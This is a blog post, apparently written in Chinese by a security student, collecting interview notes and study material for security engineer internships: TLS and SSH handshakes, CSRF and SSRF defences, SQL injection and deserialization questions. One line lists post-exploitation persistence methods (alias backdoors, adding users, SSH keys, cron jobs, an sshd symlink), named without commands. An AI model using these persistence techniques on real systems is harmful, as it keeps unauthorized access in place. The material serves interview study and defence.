6.曾参与数据安全、资金风控、内容风控、数据风控、反欺诈、反洗钱等系统的开发与落地;

7.对机器学习相关方法有实际应用经验;

8.在CCF A/B类会议上发表过文章。

自我介绍

代码审计出3个0day(codefever , dreamercms)

ctf,获奖如西湖论剑线上第7,学到了些sql,

写了个jndi工具

渗透

hw

面经

以下这一批面经不是很全

(7条未读私信) 我的秋招安全之路:美团-安全工程师-一面凉经_笔经面经_牛客网 (nowcoder.com)

美团安全工程师一面(实习)_牛客网 (nowcoder.com)

安全工程师面经-百度美团腾讯深信服奇安信等_牛客网 (nowcoder.com)

(44条消息) 美团安全工程师一面_美团安全面试18810596011_Wangxiaosong1211的博客-CSDN博客

(44条消息) 美团点评二面(安全工程师)_考试考试考试的博客-CSDN博客

面对面oj,敲递推

问了web和计网

如何优化递推

计网搜东西的过程讲一讲

交换公钥

知识储备

一面的时候很急,只提前了一天通知,所以其实根本来不及准备就裸面了,但是效果看上去还可

python 闭包

url中输入地址发生了什么

tls握手:

客户端 服务端

clienthello

--随机数-加密套件 -》

​ server hello

​ 《--- 随机数 选择的加密方式 证书

​ 《------公钥

公钥加密自己生成的预主密钥--》

​ 《---私钥解密得到预主密钥

对此加密,密钥为预主密钥,方式为选中的加密套件

ssh握手 :SSH协议握手核心过程_哔哩哔哩_bilibili

ssh 密码登录原理,ssh 公钥登录原理:

密码口令登录

  通过密码进行登录,主要流程为:

    1、客户端连接上服务器之后,服务器把自己的公钥传给客户端

    2、客户端输入服务器密码通过公钥加密之后传给服务器

    3、服务器根据自己的私钥解密登录密码,如果正确那么就让客户端登录

公钥登录

  公钥登录是为了解决每次登录服务器都要输入密码的问题,流行使用RSA加密方案,主要流程包含:

    1、客户端生成RSA公钥和私钥

    2、客户端将自己的公钥存放到服务器

    3、客户端请求连接服务器,服务器将一个随机字符串发送给客户端

    4、客户端根据自己的私钥加密这个随机字符串之后再发送给服务器

    5、服务器接受到加密后的字符串之后用公钥解密,如果正确就让客户端登录,否则拒绝。这样就不用使用密码了。

CSRF防御:

1通过referer判断页面来源进行CSRF防护,该方式无法防止站内CSRF攻击及referer字段伪造。

2重要功能点使用动态验证码进行CSRF防护。

3通过token方式进行CSRF防护:(CSRF-Token)CSRF防御之token认证_. . . . .的博客-CSDN博客_csrf防御token

ssrf防御:

1、过滤返回的信息,如果web应用是去获取某一种类型的文件。那么在把返回结果展示给用户之前先验证返回的信息是否符合标准。

2、统一错误信息,避免用户可以根据错误信息来判断远程服务器的端口状态。

3、限制请求的端口,比如80,443,8080,8090。

4、禁止不常用的协议,仅仅允许http和https请求。可以防止类似于file:///,gopher://,ftp://等引起的问题。

5、使用DNS缓存或者Host白名单的方式。

cookie能不能跨域:

浏览器默认cookie禁止跨域,但是在二级域名可以共享cookie

页面请求中没有referrer信息的几种情况:

  • 直接访问

  • https跳转到http

http和https区别:

  • 无需证书/需要CA证书

  • 80,443

  • 明文/加密

  • 直接连接/tls握手

tcp/udp区别:

  • 报文长/报文短

  • tcp专注报文的准确性,数据的顺序/udp不关注准确性和顺序,可能丢包

  • 基于连接/基于无连接

  • 流模式/数据报模式

各层有哪些协议这些基本内容

四次挥手

image-20230327164008297

操作系统线程和进程之间的关系:

进程是程序执行的独立单元,一个进程里面可以拥有多个线程,进程也是cpu资源分配的最小单位

线程是cpu调度的最小单位,与隶属于同一个进程的其他线程一起共享资源,同时,它是进程的实体

getshell如何留后门:

aliens留后门,添加用户,ssh公钥登录,定时任务,sshd软链接,trace后门

真实面试

一面

自我介绍(并且询问了我挖掘到的漏洞的细节)

为什么会选择挖这个应用,你是如何确定目标的

漏洞挖掘流程

rce可能的风险(就是问我什么情况下可能存在rce,有多少说多少,这个和安恒代码审计岗一样)

如果需要你写脚本检测越权,你如何编写

答:这里我回答了开发burp插件,然后把经过burp的流量都进行测试,在有传输用户参数的地方用两个账户进行测试

代码审计如何挖掘越权

答:这里大致讲了黑白盒同时进行挖掘,面试官提示我多讲讲白盒审计的细节,我说可以找一处鉴权非常完善安全的代码,然后去看看其他鉴权的地方代码与这段代码的差异,如果有存在一些开发写的比较潦草简单的地方,可能就存在漏洞

sql注入布尔盲注需要怎么判断

sqlmap是怎么判断布尔盲注的

java熟悉吗,复现过哪些漏洞

java反序列化用自己的话讲一讲流程是怎么样的

java反序列化和php反序列化的区别

知道为什么会出现反序列化吗,是什么业务场景

看你有打ctf,有没有哪道ctf题可以分享的

答:这里本来想讲西湖论剑,但是感觉前面说洞的时候重复了,所以讲了字节ctf那道node,还和他说了多种解法

你ctf会出题,出过些什么样的题目

二面

自我介绍

挖洞细节

CTF比赛是什么方向的,然后居然看了一下我一些ctf的成绩

你现在在学校吗,还是出来实习了

我如实回答了,出来实习了,面试官问我实习到什么时候,我说到期末的时候,他说是不是5,6月这样,我说是的

常见的漏洞的缓解和防御有了解吗

CSRF的原理和防御

CSRF的成因

知道哪些权限控制的方式呢,除了token,cookie这些

我:同源策略,零信任

讲一个比较熟悉的常见漏洞(我讲了sql注入)

sql注入原理攻击和防御讲一讲

ok, 那如果要你写规则,你会怎么针对sql注入进行过滤拦截

linux了解吗?

我:平时拿他来搭建环境,了解命令行的使用,这学期开始学操作系统这门课

k8s了解吗?

我:还在学,在搭环境,然后讲了一下wmctf那个k8s获取敏感信息的利用

平时开发用的哪些编程预言?

我:平时写exp是用python, php的话开发过购物系统OA,java的话还在学mvc和数据库交互这块,cpp的话是平时用于学校打oj

(淦,忘了和他说我会Node了)

刑,我没什么问题了,反问

您们是架构安全,可以讲讲做什么的吗

我们现在主要做的是在很多的容器底层做一个安全架构,比如说客户端的流量进来到容器,再从容器来到操作系统? 我们可以现在底层做一个过滤,这个时候它的sql语句已经拼接好了,那我们可以直接对他进行过滤。还有就是针对内核提权这些,我们可能一个是从容器的权限上做限制,另一个可能是从底层做隔离

结果:回到人才库(大池子),但是面试个人感觉水,怀疑刷kpi

尾声

还有一篇:https://www.viewofthai.link/2023/07/05/2023%e6%98%a5-%e5%ae%9e%e4%b9%a0%e9%9d%a2%e7%bb%8f%e5%92%8c%e6%88%91%e7%9a%84%e5%87%86%e5%a4%87%e4%b8%8b/

暂无评论

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇
下一篇